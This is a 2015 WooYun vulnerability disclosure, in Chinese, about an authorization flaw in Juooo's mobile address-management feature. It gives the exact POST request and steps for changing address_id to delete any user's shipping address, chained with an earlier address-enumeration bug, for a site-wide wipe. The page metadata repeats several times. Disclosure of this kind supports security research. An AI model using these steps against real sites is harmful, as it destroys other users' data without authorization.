聚橙网某功能缺陷可越权删除所有用户某重要信息

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0141233

漏洞标题：聚橙网某功能缺陷可越权删除所有用户某重要信息

漏洞作者： 163dotcom

提交时间：2015-09-15 11:04

修复时间：2015-10-30 11:06

公开时间：2015-10-30 11:06

漏洞类型：未授权访问/权限绕过

危害等级：高

自评Rank：15

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-09-15：积极联系厂商并且等待厂商认领中，细节不对外公开
2015-10-30：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

聚橙网某功能缺陷可越权删除所有用户某重要信息

详细说明：

聚橙网触屏版地址管理功能缺陷，导致可以删除任意用户的地址。

POST /myjuooo/ajax/delete_address HTTP/1.1
Host: m.juooo.com
address_id=375554

漏洞证明：

操作步骤：
1、登录聚橙网触屏版：m.juooo.com；
2、新增地址，然后删除，抓包，改address_id为任意其他id；
3、利用之前的任意用户收货地址泄漏的漏洞（未能联系到厂商或者厂商积极拒绝，漏洞依然存在），http://wooyun.org/bugs/wooyun-2015-0116172，可以遍历聚橙网全站所有收货地址：

http://www.juooo.com/myjuooo/address/?address_id=371000

以上几步综合利用，删除聚橙网全站所有收货地址将不是问题！

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0141233

漏洞标题：聚橙网某功能缺陷可越权删除所有用户某重要信息

相关厂商：聚橙网

漏洞作者： 163dotcom

提交时间：2015-09-15 11:04

修复时间：2015-10-30 11:06

公开时间：2015-10-30 11:06

漏洞类型：未授权访问/权限绕过

危害等级：高

自评Rank：15

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 163dotcom@乌云

漏洞回应

厂商回应：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0141233

漏洞标题：聚橙网某功能缺陷可越权删除所有用户某重要信息

相关厂商：聚橙网

漏洞作者： 163dotcom

提交时间：2015-09-15 11:04

修复时间：2015-10-30 11:06

公开时间：2015-10-30 11:06

漏洞类型：未授权访问/权限绕过

危害等级：高

自评Rank：15

漏洞状态：未联系到厂商或者厂商积极忽略

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0141233"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 163dotcom@乌云

漏洞回应

厂商回应：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：